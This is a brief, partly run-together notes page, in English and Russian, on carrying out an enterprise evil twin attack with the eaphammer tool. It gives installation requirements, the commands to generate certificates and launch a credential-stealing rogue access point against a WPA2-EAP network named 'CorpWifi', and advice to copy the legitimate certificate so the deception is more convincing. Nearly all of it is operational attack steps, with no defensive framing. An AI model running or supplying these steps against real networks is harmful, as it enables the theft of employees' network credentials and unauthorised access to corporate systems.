Enterprise
Evil Twin
Eaphammer
Firstly install requirements with venv !! python3.11 !!
bs4
pywebcopy
flask_socketio
flask_cors
flask
tqdm
pyOpenSSL
pemTo setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:
# generate certificates
./eaphammer --cert-wizard
# launch attack
sudo ./eaphammer --essid CorpWifi --bssid 02:27:22:08:08:89 --interface wlan1 --credsImport certificate
View installed certs
Dump original cert
Для более убедительной атаки сертификат, представляемый пользователям при аутентификации, должен быть похож на легитимный сертификат. Сертификат, используемый легитимной точкой доступа (AP), можно извлечь из захвата сети с помощью следующего инструмента: ссылка на скрипт.
Last updated